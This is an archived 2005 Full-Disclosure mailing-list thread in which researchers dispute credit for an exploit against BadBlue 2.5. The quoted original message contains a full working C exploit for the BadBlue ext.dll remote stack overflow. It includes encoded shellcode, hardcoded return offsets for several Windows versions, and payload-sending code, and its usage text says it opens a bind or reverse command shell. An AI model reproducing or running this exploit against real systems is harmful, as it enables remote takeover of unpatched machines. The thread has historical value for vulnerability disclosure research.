lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <002a01c51d9a$b67f6ae0$0200a8c0@box>
From: class101 at hat-squad.com (class 101)
Subject: [HAT-SQUAD] BadBlue,
	Easy P2P File Sharing Remote Exploit (update)

RE: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit (update)next time then publish both in same time because coded or not because of timeline , the exploit has been brought in first by hat-squad , sorry ;>


-------------------------------------------------------------
class101
Jr. Researcher
Hat-Squad.com
-------------------------------------------------------------
  ----- Original Message ----- 
  From: Andres Tarasco 
  To: 'class101@...-squad.com' 
  Cc: 'full-disclosure@...ts.netsys.com, vulnwatch@...nwatch.org' 
  Sent: Monday, February 28, 2005 11:18 AM
  Subject: RE: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit (update)


  > Hole History: 
  > 
  >   26-2-2005: BOF flaw published by Andres Tarasco of sia.es 
  >   27-2-2002: Hat-Squad.com releases an exploit 
  >   28-2-2005: haxorcitos releases a dupe with fake date :> 
  >              or you sux doing private stuffs. 

  Thats simply not true. 
  Miguel Tarasco developed the first functional exploit for this vulnerability. 
  This exploit was not published before because of disclosure Timeline. 

  regards 




  On Mon, 28 Feb 2005 09:42:11 +0100, class 101 <class101@...-squad.com> wrote: 
  > (reposting again with the hole history) 
  > Andres Tarasco of sia.es has published yesterday a security hole affecting 
  > BadBlue 2.5 and below. 
  > 
  > http://seclists.org/lists/fulldisclosure/2005/Feb/0704.html 
  > 
  > Hat-Squad.com brought you a fresh exploit. 
  > The exploit and BadBlue v2.5 are both available at class101.org for your 
  > exploitation's pratices, njoy :) 
  > 
  > /* 
  > BadBlue, Easy File Sharing Remote BOverflow 
  > 
  > Homepage:         badblue.com 
  > Affected version: v2.5 (2.60 and below not tested) 
  > Patched  version: v2.61 
  > Link:             badblue.com/bbs98.exe 
  > Date:             27 February 2005 
  > 
  > Application Risk: Severely High 
  > Internet Risk:    Low 
  > 
  > Dicovery Credits: Andres Tarasco (atarasco _at_ sia.es) 
  > Exploit Credits : class101 & metasploit.com 
  > 
  > Hole History: 
  > 
  >   26-2-2005: BOF flaw published by Andres Tarasco of sia.es 
  >   27-2-2002: Hat-Squad.com releases an exploit 
  >   28-2-2005: haxorcitos releases a dupe with fake date :> 
  >              or you sux doing private stuffs. 
  > 
  > Notes: 
  > 
  >   -6 bad chars, 0x00, 0x26, 0x20, 0x0A, 0x8C, 0x3C, badly interpreted by 
  > BadBlue 
  >   -using offsets from ext.dll, universal. 
  >   -use findjmp2 to quick search into ext.dll to see 
  >    if the offsets changes in the others BadBlue's versions below 2.5 
  >   -if you need the v2.5 for exploitation's pratices, get it on class101.org 
  >   -rename to .c for nux, haven't tested this one but it should works fine. 
  > 
  > Greet: 
  > 
  >   Nima Majidi 
  >         Behrang Fouladi 
  >   Pejman 
  >   Hat-Squad.com 
  >   metasploit.com 
  >   A^C^E of addict3d.org 
  >   str0ke of milw0rm.com 
  >   and my homy class101.org :> 
  > */ 
  > 
  > #include <stdio.h> 
  > #include <string.h> 
  > #include <time.h> 
  > #ifdef WIN32 
  > #include "winsock2.h" 
  > #pragma comment(lib, "ws2_32") 
  > #else 
  > #include <sys/socket.h> 
  > #include <sys/types.h> 
  > #include <netinet/in.h> 
  > #include <netinet/in_systm.h> 
  > #include <netinet/ip.h> 
  > #include <netdb.h> 
  > #include <arpa/inet.h> 
  > #include <unistd.h> 
  > #include <stdlib.h> 
  > #include <fcntl.h> 
  > #endif 
  > 
  > char scode[]= 
  > /*XORed, I kiss metasploit.com because they are what means elite!*/ 
  > "\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x03" 
  > "\x7b\x5b\x13\x83\xee\xfc\xe2\xf4\xff\x11\xb0\x5c\xeb\x82\xa4\xec" 
  > "\xfc\x1b\xd0\x7f\x27\x5f\xd0\x56\x3f\xf0\x27\x16\x7b\x7a\xb4\x98" 
  > "\x4c\x63\xd0\x4c\x23\x7a\xb0\xf0\x33\x32\xd0\x27\x88\x7a\xb5\x22" 
  > "\xc3\xe2\xf7\x97\xc3\x0f\x5c\xd2\xc9\x76\x5a\xd1\xe8\x8f\x60\x47" 
  > "\x27\x53\x2e\xf0\x88\x24\x7f\x12\xe8\x1d\xd0\x1f\x48\xf0\x04\x0f" 
  > "\x02\x90\x58\x3f\x88\xf2\x37\x37\x1f\x1a\x98\x22\xc3\x1f\xd0\x53" 
  > "\x33\xf0\x1b\x1f\x88\x0b\x47\xbe\x88\x3b\x53\x4d\x6b\xf5\x15\x1d" 
  > "\xef\x2b\xa4\xc5\x32\xa0\x3d\x40\x65\x13\x68\x21\x6b\x0c\x28\x21" 
  > "\x5c\x2f\xa4\xc3\x6b\xb0\xb6\xef\x38\x2b\xa4\xc5\x5c\xf2\xbe\x75" 
  > "\x82\x96\x53\x11\x56\x11\x59\xec\xd3\x13\x82\x1a\xf6\xd6\x0c\xec" 
  > "\xd5\x28\x08\x40\x50\x28\x18\x40\x40\x28\xa4\xc3\x65\x13\x5b\x76" 
  > "\x65\x28\xd2\xf2\x96\x13\xff\x09\x73\xbc\x0c\xec\xd5\x11\x4b\x42" 
  > "\x56\x84\x8b\x7b\xa7\xd6\x75\xfa\x54\x84\x8d\x40\x56\x84\x8b\x7b" 
  > "\xe6\x32\xdd\x5a\x54\x84\x8d\x43\x57\x2f\x0e\xec\xd3\xe8\x33\xf4" 
  > "\x7a\xbd\x22\x44\xfc\xad\x0e\xec\xd3\x1d\x31\x77\x65\x13\x38\x7e" 
  > "\x8a\x9e\x31\x43\x5a\x52\x97\x9a\xe4\x11\x1f\x9a\xe1\x4a\x9b\xe0" 
  > "\xa9\x85\x19\x3e\xfd\x39\x77\x80\x8e\x01\x63\xb8\xa8\xd0\x33\x61" 
  > "\xfd\xc8\x4d\xec\x76\x3f\xa4\xc5\x58\x2c\x09\x42\x52\x2a\x31\x12" 
  > "\x52\x2a\x0e\x42\xfc\xab\x33\xbe\xda\x7e\x95\x40\xfc\xad\x31\xec" 
  > "\xfc\x4c\xa4\xc3\x88\x2c\xa7\x90\xc7\x1f\xa4\xc5\x51\x84\x8b\x7b" 
  > "\xf3\xf1\x5f\x4c\x50\x84\x8d\xec\xd3\x7b\x5b\x13"; 
  > 
  > char payload[1024]; 
  > 
  > char ebx[]="\x05\x53\x02\x10";  /*call.ext.dll*/ 
  > char ebx2[]="\xB0\x55\x02\x10"; /*pop.pop.ret.ext.dll thx findjmp2 ;>*/ 
  > char pad[]="\xEB\x0C\x90\x90"; 
  > char pad2[]="\xE9\x05\xFE\xFF\xFF"; 
  > char EOL[]="\x0D\x0A\x0D\x0A"; 
  > char talk[]= 
  > "\x47\x45\x54\x20\x2F\x65\x78\x74\x2E\x64\x6C\x6C\x3F\x6D\x66\x63" 
  > "\x69\x73\x61\x70\x69\x63\x6F\x6D\x6D\x61\x6E\x64\x3D"; 
  > 
  > #ifdef WIN32 
  >  WSADATA wsadata; 
  > #endif 
  > 
  > void ver(); 
  > void usage(char* us); 
  > 
  > int main(int argc,char *argv[]) 
  > { 
  >  ver(); 
  >  unsigned long gip; 
  >  unsigned short gport; 
  >  char *target, *os; 
  >  if 
  > (argc>6||argc<3||atoi(argv[1])>3||atoi(argv[1])<1){usage(argv[0]);return -1; 
  > } 
  >  if (argc==5){usage(argv[0]);return -1;} 
  >     if (strlen(argv[2])<7){usage(argv[0]);return -1;} 
  >     if (argc==6) 
  >  { 
  >         if (strlen(argv[4])<7){usage(argv[0]);return -1;} 
  >  } 
  > #ifndef WIN32 
  >  if (argc==6) 
  >  { 
  >    gip=inet_addr(argv[4])^(long)0x93939393; 
  >   gport=htons(atoi(argv[5]))^(short)0x9393; 
  >  } 
  > #define Sleep  sleep 
  > #define SOCKET  int 
  > #define closesocket(s) close(s) 
  > #else 
  >  if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup 
  > error\n");return -1;} 
  >  if (argc==6) 
  >  { 
  >   gip=inet_addr(argv[4])^(ULONG)0x93939393; 
  >   gport=htons(atoi(argv[5]))^(USHORT)0x9393; 
  >  } 
  > #endif 
  >  int ip=htonl(inet_addr(argv[2])), port; 
  >  if (argc==4||argc==6){port=atoi(argv[3]);} else port=80; 
  >  SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server; 
  >  s=socket(AF_INET,SOCK_STREAM,0); 
  >  if (s==-1){printf("[+] socket() error\n");return -1;} 
  >  if (atoi(argv[1]) == 1){target=ebx;os="Win2k SP4 Server English\n[+] 
  > Win2k SP4 Pro.   English\n[+]            Win2k SP- -      -";} 
  >  if (atoi(argv[1]) == 2){target=ebx2;os="WinXP SP2  Pro. English\n[+] 
  > WinXP SP1a Pro. English\n[+]            WinXP SP-  -    -";} 
  >  if (atoi(argv[1]) == 3){target=ebx2;os="Win2003 SP4 Server English\n[+] 
  > Win2003 SP- -      -";} 
  >  printf("[+] target(s): %s\n",os); 
  >  server.sin_family=AF_INET; 
  >  server.sin_addr.s_addr=htonl(ip); 
  >  server.sin_port=htons(port); 
  >  if (argc==6){printf("[+] reverse mode disabled for this exploit\n"); 
  >  printf("[+] get the source at class101.org and update 
  > yourself!\n");return -1;} 
  >  connect(s,( struct sockaddr *)&server,sizeof(server)); 
  >  timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask); 
  >  switch(select(s+1,NULL,&mask,NULL,&timeout)) 
  >  { 
  >   case -1: {printf("[+] select() error\n");closesocket(s);return -1;} 
  >   case 0: {printf("[+] connect() error\n");closesocket(s);return -1;} 
  >   default: 
  >   if(FD_ISSET(s,&mask)) 
  >   { 
  >    printf("[+] connected, constructing the payload...\n"); 
  > #ifdef WIN32 
  >    Sleep(1000); 
  > #else 
  >    Sleep(1); 
  > #endif 
  >    strcpy(payload,talk); 
  >    memset(payload+29,0x90,520); 
  >    if (atoi(argv[1]) == 1||atoi(argv[1]) == 2) 
  >    { 
  >     memcpy(payload+29+492,&pad,4); 
  >     memcpy(payload+521+4,target,4); 
  >     memcpy(payload+536+1,pad2,5); 
  >    } 
  >    else 
  >    { 
  >     memcpy(payload+29+485,&pad,4); 
  >     memcpy(payload+514+4,target,4); 
  >     memcpy(payload+529+1,pad2,5); 
  >    } 
  >    strcat(payload,EOL); 
  >    memcpy(payload+36+3,scode,strlen(scode)); 
  >    if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 1, 
  > the server prolly rebooted.\n");return -1;} 
  > #ifdef WIN32 
  >    Sleep(2000); 
  > #else 
  >    Sleep(2); 
  > #endif 
  > 
  >    printf("[+] size of payload: %d\n",strlen(payload)); 
  >    printf("[+] payload sent.\n"); 
  >    return 0; 
  >   } 
  >  } 
  >  closesocket(s); 
  > #ifdef WIN32 
  >  WSACleanup(); 
  > #endif 
  >  return 0; 
  > } 
  > 
  > void usage(char* us) 
  > { 
  >  printf("USAGE:\n"); 
  >  printf("      [+]  . 101_bblu.exe Target VulnIP (bind mode)\n"); 
  >  printf("      [+]  . 101_bblu.exe Target VulnIP VulnPORT (bind mode)\n"); 
  >  printf("      [+]  . 101_bblu.exe Target VulnIP VulnPORT GayIP GayPORT 
  > (reverse mode)\n"); 
  >  printf("TARGET:                               \n"); 
  >  printf("      [+] 1. Win2k  SP4  Server English (*)\n"); 
  >  printf("      [+] 1. Win2k  SP4  Pro    English (*)\n"); 
  >  printf("      [+] 1. Win2k  SP-  -      -          \n"); 
  >  printf("      [+] 2. WinXP  SP2  Pro.   English    \n"); 
  >  printf("      [+] 2. WinXP  SP1a Pro.   English (*)\n"); 
  >  printf("      [+] 2. WinXP  SP-  -      -          \n"); 
  >  printf("      [+] 3. Win2k3 SP0  Server Italian (*)\n"); 
  >  printf("      [+] 3. Win2k3 SP-  -      -          \n"); 
  >  printf("NOTE:                                      \n"); 
  >  printf("      The exploit bind a cmdshell port 101 or\n"); 
  >  printf("      reverse a cmdshell on your listener.\n"); 
  >  printf("      A wildcard (*) mean tested working, else, supposed 
  > working.\n"); 
  >  printf("      A symbol   (-) mean all.\n"); 
  >  printf("      Compilation msvc6, cygwin, Linux.\n"); 
  >  return; 
  > } 
  > void ver() 
  > { 
  >  printf(" 
  > \n"); 
  >  printf(" 
  > ===================================================[0.1]=====\n"); 
  >  printf("        ================BadBlue, Easy File Sharing 
  > 2.5===============\n"); 
  >  printf("        ================ext.dll, Remote Stack 
  > Overflow===============\n"); 
  >  printf("        ======coded by 
  > class101==================[Hat-Squad.com]=====\n"); 
  >  printf("        =====================================[class101.org 
  > 2005]=====\n"); 
  >  printf(" 
  > \n"); 
  > } 
  > 
  > ------------------------------------------------------------- 
  > class101 
  > Jr. Researcher 
  > Hat-Squad.com 
  > ------------------------------------------------------------- 
  > 
  > _______________________________________________ 
  > Full-Disclosure - We believe in it. 
  > Charter: http://lists.netsys.com/full-disclosure-charter.html 
  > 



  -- 
  Loco de aTar 

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050228/8de7c81a/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ